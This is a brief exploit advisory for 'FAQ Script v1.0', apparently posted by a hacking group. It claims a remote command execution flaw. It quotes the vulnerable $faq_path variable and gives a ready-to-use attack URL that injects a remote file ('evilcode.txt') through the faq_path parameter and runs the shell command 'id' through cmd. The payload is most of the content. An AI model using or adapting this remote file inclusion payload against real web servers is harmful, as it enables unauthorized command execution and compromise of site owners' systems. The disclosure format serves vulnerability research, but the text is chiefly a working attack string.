FAQ Script versions 1.0 suffers from a remote command execution vulnerability.
36b93f65f96db91e171339ccd77ee912eb94198363c947736f93c9bf1c8bd7a2
>>> Kurdish Security
>>> FAQ Script v1.0 Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : FAQ Script
>>> Site : http://www.knusperleicht.at
Code :
//if the script is includet you have to set this path else the path must be $faq_path = "";
$faq_path = "";
http://www.site.com/[path]/index.php?faq_path=evilcode.txt?&cmd=id